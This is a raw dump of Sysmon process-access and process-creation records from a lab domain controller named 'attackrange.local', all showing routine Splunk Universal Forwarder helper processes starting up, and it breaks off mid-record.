16:04:07.248{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5477-6008-C306-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5477-6008-C306-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.249{7901BC46-5477-6008-C306-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.686{7901BC46-5478-6008-C506-00000000A301}48926908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5478-6008-C506-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5478-6008-C506-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.545{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5478-6008-C506-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:08.546{7901BC46-5478-6008-C506-00000000A301}4892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.686{7901BC46-5479-6008-C606-00000000A301}28521296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5479-6008-C606-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5479-6008-C606-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.545{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5479-6008-C606-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:09.546{7901BC46-5479-6008-C606-00000000A301}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-547A-6008-C806-00000000A301}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-547A-6008-C806-00000000A301}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.982{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-547A-6008-C806-00000000A301}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 